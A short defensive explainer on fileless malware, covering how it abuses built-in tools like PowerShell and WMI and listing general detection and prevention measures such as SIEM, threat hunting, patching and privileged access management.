Fileless Malware and a bit of what it is
Fileless malware is a type of malicious code, that is advance in nature which uses legitimate programs to infect a computer that exists exclusively memory-based.
It is known to hijack programs and tools of the victim’s system for attacking. As simple as PowerShell, Shell, WMI, macros becoming vulnerable for executing malicious code. This does not rely on traditional malware techniques and leaves very little to no-footprint, making it challenging to detect. In most cases, it becomes traceless with a reboot of the system.
Fileless malware attacks know to evade defenses like – application whitelisting as they take advantage of applications that are already installed and are on the approved list.
To understand further, no operating system is foolproof and the industry has seen advance fileless malware attacks on Windows, Linux, and other OS platforms. Similar to most of the attacks, fileless attacks are known to be using email spear-phishing, social engineering techniques and lateral moment to gain access rights to their targets. Mostly by taking over vulnerable legitimate programs and riding on their back.
Approaches to detect the infection
Chances are that your EPP/ EDR may have been bypassed already, and if they don’t help in detection, using below approaches would help you uncover an ongoing attack.
⁃ A well-tuned SIEM can help in detection. Usually based on the correlated behavior that the infected triggers.
⁃ A Threat hunting exercise; analyzing through ‘in-memory’ and system file integrity analysis.
⁃ Digital forensics (labor and $ intensive)
Approaches know to prevent
-Nothing beats keeping software up to date with patches.
⁃ Sound endpoint protection in combination with Gateway email threat prevention.
⁃ Reducing the attack surface; disabling the unwanted services, programs and exposure.
⁃ Admin user protection, Privileged Access Management to control unrestricted admin access.
⁃ Regular Penetration Testing exercises would help harden the infrastructure
Preventing and Detecting the fileless malware attacks early in the attack cycle needs an end-to-end approach addressing the entire threat lifecycle with well-defined controls in place at different layers.